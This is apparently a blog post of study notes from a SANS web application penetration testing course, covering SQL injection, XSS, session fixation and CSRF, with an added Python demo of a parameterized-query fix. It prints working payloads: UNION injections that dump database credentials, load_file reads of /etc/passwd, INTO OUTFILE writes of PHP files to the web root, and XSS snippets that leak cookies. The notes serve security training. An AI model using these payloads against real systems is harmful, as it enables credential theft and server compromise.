Inaccurate Design

SANS GWAPT Day 4: Exploitation

Thursday, 16 May 2013

Authentication Bypass

  • Attempt to force-browse to pages that require authentication

    • Can do this manually or with automated tools
  • If a page returns a 302, check in Burp whether the response body still contains any other content

SQL Injection

  • Example SQL options

    • OR 1=1
    • OR 1>0
    • OR 1<\0

    • use ‘-- ’ (dash dash space) to comment out everything after the injected text. The space is important!

    • Be sure to compare ints to ints and strings to strings

    • Can use LIMIT and ORDER BY to control which rows come back and in what order

  • Stacked queries (i.e. queries separated by a semicolon) can be used to execute multiple queries

  • UNION SELECT statements can join two SELECT statements together

    • Note that the two SELECT statements need to return the same number of columns
kevin' union select 1,2,3,4 -- # find out how many columns are being displayed
kevin' union select user(),version(),database() -- # adjust the number of fields until the union works
kevin' union select 1,1,user,password from mysql.user -- # adjust the number of fields until the union works
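The union technique above, as an added example that is not from the course notes: a lookup built by string concatenation next to its parameterized fix, run against an in-memory SQLite database standing in for MySQL (the tables, rows and the `credentials` table are constructed for the demo). The same two probes from the notes show why the column count matters and why the bound parameter never becomes SQL.

```python
import sqlite3


def make_db():
    """Constructed sample schema and rows (not from the course notes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.execute("CREATE TABLE credentials (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("kevin", "kevin@example.test"), ("alice", "alice@example.test")])
    conn.execute("INSERT INTO credentials VALUES (?, ?)",
                 ("dbadmin", "placeholder-secret"))
    return conn


def lookup_concatenated(conn, name):
    """Vulnerable: the input is spliced into the SQL text, so a quote closes the
    literal and a UNION appends a second SELECT. Returns the rows, or the
    database error text when the injected SELECT has the wrong column count."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    try:
        return sorted(conn.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        return str(exc)


def lookup_parameterized(conn, name):
    """Hardened: the value is bound to a placeholder and is never parsed as SQL,
    so the same input simply matches no user and returns nothing."""
    rows = conn.execute("SELECT name, email FROM users WHERE name = ?", (name,))
    return sorted(rows.fetchall())


# The two UNION probes from the notes: a column-count mismatch first, then one
# adjusted to line up with the two displayed columns.
PROBE_WRONG_WIDTH = "kevin' union select 1,2,3 -- "
PROBE_DUMP = "kevin' union select user, password from credentials -- "

if __name__ == "__main__":
    db = make_db()
    print(lookup_concatenated(db, PROBE_WRONG_WIDTH))   # column-count error text
    print(lookup_concatenated(db, PROBE_DUMP))          # kevin's row plus the credentials row
    print(lookup_parameterized(db, PROBE_DUMP))         # []
```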

Using Files with SQL Injection

  • Highly dependent on the DB in use

  • Can read and write with the permissions of the database user (often www-data or root)

  • In MySQL

    • you can use load_file() to display a file from the filesystem
kevin' union select user(),version(),load_file('/etc/passwd'); -- 
  • can also use INTO OUTFILE (or INTO DUMPFILE) to write results to a file
kevin' union select user(),version() into outfile '/var/www/dump.txt'; -- 
  • This may produce the error ‘not a valid MySQL result resource’, because the statement doesn’t return any data

  • Can write arbitrary data to files on the OS

' union select '','' into outfile '/var/www/dump.php'; -- 

OS Interaction with SQL Injection

  • Various attacks

    • write results to file, TFTP out
    • write results to file, create new DB table, upload results to table, extract data with SELECT statements
  • Can attempt to re-enable xp_cmdshell with sp_configure (only works if you’re the sa user)

  • SQLMap can automate a lot of these tasks

  • Can portscan through an SQL injection

    • only works on MSSQL backends
    • the ‘OPENROWSET’ function allows you to retrieve data from another
SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sa; pwd=; network=DBNETLIB; Address=x.x.x.x,8888; timeout=5', 'select * from table')
  • If it returns ‘Doesn’t exist or access denied’ then the port is not open
  • If it returns ‘Reported an error’ then it is open

  • Prepared shells include PHPShell and AJAXShell

  • Blind SQL injection is the same as normal SQL injection, but the errors are not displayed by the application

Cross Site Scripting

  • Difficult to exploit XSS in POST parameters

    • still doable, for example by crafting a malicious Flash package that sends the request
  • Can load JavaScript from remote servers

  • Can post cookies to a server controlled by you

<script>document.write('<img src="'+document.cookie+'">');</script>
  • Can use malformed tags, spaces, line breaks, etc. to trick filters into accepting XSS
    • can quickly be used to post cookies to a server controlled by the attacker
<IMG '''><script>alert('xss')'>
<B C=">" onmouseover="alert(document.location=''+document.cookie)" X="H E L L O !
  • Can encode quotes or the whole string in Hex, or HTML entities

  • Can use IFRAMEs to perform basic port scanning

    • You can’t access the local IP address through JS, but you can with a Java Applet
  • Durzosploit can be used to generate payloads for XSS attacks

  • Can build Zombie botnets through XSS attacks

    • useful tool here is BeEF
    • can also use AttackAPI

Limiting Targets of XSS attacks

  • Generally 5 possibilities
    • client-side code with Java app identifying IP address
    • client-side code with Attacker server identifying IP address
    • server-side code on the target server
    • server-side code on the attacker server
    • attacker infrastructure configuration

Session Fixation Attacks

  • Premise is that the session ID does not change after the user logs in

    1. Attacker can craft a link containing a session ID
    2. Target logs in
    3. Attacker knows session ID and can hijack the session.
  • Only fix is to change the session cookie when the user logs in

Cross Site Request Forgery

  • MonkeyFix is a tool that will host XSRF exploits for testing
    • will attack based on referrer
    • able to launch attack transparently while redirecting user to a destination site